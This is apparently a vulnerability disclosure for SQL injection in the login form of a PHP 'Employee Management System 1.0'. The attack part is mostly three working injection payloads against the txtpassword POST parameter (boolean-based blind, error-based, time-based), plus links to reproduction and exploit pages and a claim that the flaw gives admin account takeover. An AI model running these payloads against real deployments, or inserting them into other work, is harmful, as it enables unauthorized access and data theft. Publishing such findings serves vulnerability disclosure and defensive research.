Employee Management System 1.0-2024 SQL Injection

## Title: employee_akpoly-management-system-1.0-2024 Multiple-SQLi## Author: nu11secur1ty## Date: 03/01/2024## Vendor: https://www.sourcecodester.com/users/walterjnr1## Software: https://www.sourcecodester.com/php/16999/employee-management-system.html## Reference: https://portswigger.net/web-security/sql-injection## Description:Potential SQLi detected in password parameter. Please confirm itmanually... The payload from the puncher_SQLi_bypass_authenticationmodule was submitted successfully after the test. You must testmanually to confirm this vulnerability! By using this vulnerabilitythe attackercan get control against an admin account and even more bad things!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: txtpassword (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR NOT2215=2215# TKHd&btnlogin=    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR (SELECT2145 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT(ELT(2145=2145,1))),0x716a787171,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# JjHm&btnlogin=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' AND (SELECT3563 FROM (SELECT(SLEEP(7)))nLaZ)# ZzRM&btnlogin=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Walterjnr1/2024/employee_akpoly-1.0-2024)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/employeeakpoly-10-2024-multiple-sqli.html)## Time spend:00:35:00